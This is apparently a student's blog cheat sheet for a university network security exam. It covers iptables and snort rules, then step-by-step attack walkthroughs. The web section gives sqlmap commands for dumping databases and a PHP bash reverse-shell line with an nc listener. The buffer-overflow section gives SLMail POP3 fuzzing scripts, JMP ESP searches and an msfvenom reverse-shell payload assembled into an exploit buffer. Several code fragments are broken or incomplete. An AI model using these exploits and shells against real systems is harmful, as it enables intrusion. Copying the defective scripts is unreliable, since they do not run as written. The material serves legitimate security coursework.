Bennett Hardwick

How to hack (QUT CAB441 cheat sheet)

October 29, 2018 - infosec

Purpose of this post

This cheat sheet is the main resource coming in with me into my CAB441 Network Security exam. As we have access to the internet, it was encouraged to create a sheet that would be readily accessible and CTRL-F-able.

Network Security


Here’s a cool cheat sheet . man iptables and main iptables-extensions are both very useful. If you want to visualise your iptables rules, check this out .


There are five built in iptables chains.

iptables flow chart


There are five built-in iptables tables. The first three are the most common. The following descriptions have been taken from the TABLES section of the man pages. The previous flow chart also shows the different tables.

There are also raw and security tables.


There are six iptables targets.

Note: there are more targets that have very specific cases. For example, the DNAT target can only exist in the nat table and will only be valid in the PREROUTING and OUTPUT chains. More info about these targets can be found in the iptables and iptables-extensions man pages.


Delete all rules:

iptables --flush

Set a default policy:

iptables --policy <chain> <target>

Set a rule for a certain protocol:

iptables -A <chain> -p <protocol> -j <target>

# Valid: tcp / udp / icmp / all ...

Iptables extensions

iptables can use extended packet matching and target modules using the -m option.

If a protocol is specified using the -p option, and an unknown extension option is encountered, iptables will load a match module identical to the name of the protocol.

These extended match modules allow further constraints on rules and add more command line options.

Matching the state of a packet

# Allow new and established packets out of the
# machine, but only allow established ones in.

iptables -A OUTPUT -m state --state NEW,ESTABLISHED \
iptables -A INPUT -m state --state ESTABLISHED \

Redirecting a packet destined for port 80 to a different ip:

# The DNAT target is an extension that becomes
# available when using the nat table and

# The --dport option is an extension that become
# availble when using the -p tcp option.

# The --to-destination option becomes available
# when using the DNAT target.

iptables -t nat -A PREROUTING \
  -i enp0s3
  -p tcp --dport 80 -j DNAT

View man iptables-extensions for more information.


You can write rules for snort by creating a .rules file in the /etc/snort/rules folder. Alternatively, you can edit the snort.conf file or use the local.rules file. Read more about how to write snort rules here .

The complete docs can be found right here .

Basic snort rule syntax:

<action> <protocol> <src-ip> <src-port> -> \
  <dst-ip> <dst-port> (<options>)


Rule options

You can find more information about rule options at the snort docs .

TCP flags


Alert when a URL is over 200 bytes long.

alert tcp $EXTERNAL_NET any -> $HOME_NET any \
  (msg:"More than 200 bytes";urilen:>200)

Web Penetration Testing


  1. Web Penetration Writeup : A pen-test walk-through, eerily mirroring the web penetration testing practical.

  2. SQL Injection Cheat Sheet : The SQL injection cheat sheet used in the aforementioned walkthrough.

  3. nmap Cheat Sheet : Simple nmap cheat sheet. The command man nmap is also very useful.

  1. nikto Cheat Sheet : Nikto scanner cheat sheet. man nikto can also be used on Kali.
  1. sqlmap Cheat Sheet Sqlmap scanner cheat sheet. man sqlmap can also be used on Kali.


  1. Identify the devices by performing a ping scan.

      nmap <network>/24 -sn
  2. After finding the devices, perform a service / port scan for each device.

      nmap <device> -sV
  3. Since this is a web penetration test, use the results of the previous nmap scan to find which device is running a http or ssl/http service. These are typically on ports 80, 433 or 8080 and contain words like httpd, Apache, etc.

  4. When the target device has been identified, visit the pages in a web browser to see what’s there. Alternatively, this could be done with the curl command. Check for common directories and files like /login, sitemap.xml and robots.txt.

  5. If nothing in particular stands out from an initial inspection, use the nikto command to perform a more thorough inspection.

    nikto -host <target> -C all

    If nothing useful pops up, run nikto on a different port or using ssl.

    nikto -host <target> -C all -ssl -p 80,8080,443

    It might also pay to run nikto with different tuning options. To focus on SQL Injection use the command

    nikto -host <target> -Tuning 9

    For more help with nikto, refer to nikto -h or man nikto.

    Note: Nikto is self described as being not stealthy, if stealth is your goal it may pay to spend more time on Step 4.

  6. Nikto will return a bunch of information relating to your query. Most likely you’ll see a bunch of directories and files on the server that may be of interest. You should inspect these files and look for any SQL injection opportunities.

  7. Plan in advance how you intend to get a reverse shell, as the exam has a fixed time and sqlmap can take a long time to run. In the case of the practical, it was obvious that it would be through the wordpress site. Once I’d gathered enough information, I decided that the easiest way to get into the wordpress site would be finding an admin user’s password.


When a page with a form or endpoint that is vulnerable to SQL injection is found, use the sqlmap tool to perform an attack.

sqlmap -u "<url>" --wizard

If you’ve found a form, you can paste the following JavaScript method into your browser’s console to get the data string.

    .map((input) => `${}=${input.value || ""}`)

When you have it, try and find a list of databases using:

sqlmap -u "<url>" --dbs --data="<data>" --level 2 --risk 2

Typically, it will use a delay based technique to determine the contents of the SQL database. If you issued the above command, and followed the prompts, you’ll see the command will slowly letter-by-letter spell out the databases on the device. When you see one that will aid your takeover.

Once you see a database that will be of interest, feel free to perform a keyboard interrupt and continue on with the next steps.

Find the tables in the target database:

sqlmap -u "<url>" --batch --tables -D <database> --data="<data>"

Once again it will type out letter-by-letter the contents of the table. When you spot something interesting, skip straight to finding it’s contents.

Find the contents of a table:

sqlmap -u "<url>" --batch --dump -D <database> -T <table> --data="<data>"

Note: Instead of going through step by step like I explained, you could use the sqlmap wizard. I find this to be incredibly slow however, and wouldn’t encourage it in a time-limited situation. Nonetheless, if you’d like to use the wizard issue the command:

sqlmap -u "<url>" --wizard

Take control

The steps to get a reverse shell will depend on the content of the database. In the case of the practical, finding the contents of the database allowed you to log into the wordpress site that was present. After logging in, a php reverse shell script could easily be added to the site.


  1. Try accessing the site using different protocols. https:// and http:// are often used to show different things.

  2. sqlmap can often take ages, but it stores data to disk as it goes. So if you perform a keyboard interrupt you can often get right back to where you were.

  3. The default table name for a Wordpress site is wordpress8080

  4. The Wordpress admin page lives as /admin

  5. This gist shows an easy way to get a reverse PHP shell

      exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");

    Before visiting the page, you should set up the listener.

    nc -nlvp 1234
  6. Since the POST method doesn’t show the data as query parameters, you will have to use the --data option of sqlmap. More information on using sqlmap with POST can be found here .

  7. John the Ripper is a useful piece of software in Kali that can crack passwords.

Exploiting Buffer Overflows


Before attempting a buffer overflow, you should read up on how the CPU works on a low level.

  1. Program Counter / Instruction Pointer
  2. Call Stack
  3. Buffer Overflow Overview
  4. SLMail Buffer Overflow Tutorial
  5. Writing An Exploit
  6. Simple Buffer Overflows


  1. Setup the machine with the vulnerability and open Immunity Debugger.

  2. Attach Immunity Debugger to the application and start it up.

  3. Determine how to cause the buffer overflow - you will most likely be told. When you know, you can start to fuzz the input to cause a crash. The following script was used for SLMail and comes from here .

    # SLMail Tutorial
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    buffer = "A" * 100
    while len(buffer) <= 4000:
            print "We are fuzzing with a length of %s bytes" % len(buffer)
            s.connect(('<address>', 110))
            data = s.recv(1024)
            s.send('USER user ' + '\r\n')
            data = s.recv(1024)
            s.send('PASS ' + buffer + '\r\n')
            data = s.recv(1024)
            buffer += 200
            print "Could not connect to POP3 for some reason..."

    Upon causing a crash, note down the length of the buffer required to cause the crash.

  4. Determine what part of the message ends up being written to the EIP register. This can be done using the pattern_create.rb file in the metasploit tools directory. This will create a unique string that will allow you to see how many characters are required to make it into the program counter.

    /usr/share/metasploit-framework/tools/exploit/pattern_create.rb <buffer length>

    Now copy and paste this into your python script.

    # SLMail Tutorial
    import socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    buffer = "<paste-here>"
        print "Sending unique buffer of %s bytes" % len(buffer)
        s.connect(('<address>', 110))
        data = s.recv(1024)
        s.send('USER user ' + '\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        data = s.recv(1024)
        print "Could not connect to POP3 for some reason..."

    Finally, inspect immunity debugger and note the characters in the EIP register. Cross reference with the pasted buffer to determine the offset.

    Note: pattern_create.rb has a sister tool called pattern_offset.rb that can help you to determine the offset.

  1. Now that you know start of the part of the message that overflows into the program counter, verify that it’s correct by sending a buffer made of “A"s, “B"s and “C"s. The “A"s represent the data that consumes the stack, the “B"s represent the return address and the “C"s represent the arbitrary shellcode to be executed.

    You can easily create this buffer using python:

    crash_length = <length>
    eip = "BBBB"
    buffer = "A" * offset + eip * "C" * (crash_length - offset - len(eip))
  2. Once you’ve verified that the offset is correct, you have to find a way to get an instruction into the program counter that will jump to the top of the stack and begin executing your arbitrary shell code.

    Inside immunity debugger, click on the command box at the bottom of the page and write the following command:

    !mona modules

    This will bring up a list of modules / libraries that are dynamically linked to the executable. Inside one of these modules is probably the assembly command JMP ESP, which will jump to the top of the stack.

    When deciding on a DLL to use, it’s important that you choose one that was compiled with DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization) disabled.

  3. Once you’ve found a module with the previous security features turned off, you must search for the command JMP ESP inside it. The shellcode for this command is FFE4 which can be found using the nasm-shell.rb utility in metasploit. Return to the command box and issue:

    !mona find -s "\xff\xe4" -m <target-dll>

    Note down the address of the memory that contains the command. As Windows is little endian, the bytes of the address should be reversed.

  4. There’s one final thing to do before starting the attack - find “bad characters” that will cause your program to stop.

    To find out what characters are bad, send a list of all ascii characters and note where it stops. Remove the troublesome characters and try again until all of them make it through. Make note of the “bad characters”.

    Here’s a list of all ascii characters:

    chars =
      "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )


Now that you’ve got all the information required to execute code on the target machine. This can be done using the tools msfvenom and shikata_ga_nai.

msfvenom -a x86 -p windows/shell_reverse_tcp \
  -e x86/shikata_ga_nai \
  -f python -b '<bad-chars>'

Once you have the payload, add it back into your python code. It’s important that you space the payload out with some NOP characters (\x90) so that your program has space to execute.

malicous_payload = "<msfvenom payload>"
return_address = "<JMP ESP address>"
offset = "<EIP offset>"
overflow_length = "<amount of characters to oveflow>"

payload = "A" * offset + return_address + \
  '\x90' * 16 + malicous_payload + \
  "C" * (overflow_length - \
    len(malicous_payload) - \
    offset - len(return_address) - 16)

Take control

Now that you’ve got your payload ready, it’s just a matter of setting up a nc listener and performing the exploit. It’s important that you test the payload before attacking a real machine, because you only get one shot. It’s also important that you don’t forget to make the return address the right one for the network you’re on.